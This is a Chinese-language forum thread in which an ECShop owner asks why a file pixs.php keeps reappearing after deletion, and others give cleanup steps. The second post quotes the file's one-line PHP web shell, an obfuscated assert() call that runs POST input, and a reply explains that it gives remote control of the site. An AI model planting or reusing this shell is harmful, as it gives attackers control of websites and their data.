登入 註冊
 

ecshop俾人值入了pixs.php
閱讀 1234 次 0 會員 與 1 訪客 正在閱讀本文。
* 十月 13, 2015, 04:43:41 下午
我的ecshop俾人值入了pixs.php這個file, delete完後又再出現.
煩請各位大大幫忙

記錄

十月 13, 2015, 05:11:19 下午
#1
1、立即更改你的ECSHOP後台管理員密碼
2、從FTT找出最近被修改過得PHP
3、比較快的方式是下到電腦然後用文字編輯器找出pixs關鍵字
4、找到後刪除該程式碼....
祝你好運!

記錄

* 十月 13, 2015, 05:32:46 下午
#2
andy大大, pixs.php這file delete極都再出現, 大約15-30分鐘後又會見到這file.
亦都試過delete了pixs.php裡面的程式碼, 都係會自動復完.
是否還有其他php files令佢復完 ?
煩請andy大大幫忙

這是pixs.php程式碼
<?php $k = str_replace("7","","a7s77s7e7r7t");$k($_POST["7"]); ?>
他的用途是什麼 ?

記錄

十月 13, 2015, 06:28:45 下午
#3
建議你先關閉網站
光刪除pixs.php是沒用的
必須找出被修改的檔案
如果你之前有作備份
把檔案覆蓋回去應該可以解決
否則就必須找出是哪個檔案被修改才能根治

<?php $k = str_replace("7","","a7s77s7e7r7t");$k($_POST["7"]); ?>是駭客用來遠端遙控你的網站
任何資料都可能被竊取與修改
你要有心裡準備
臨時的方法是
把 pixs.php 內容清空
然後設成唯讀
再慢慢抓出毒瘤...



記錄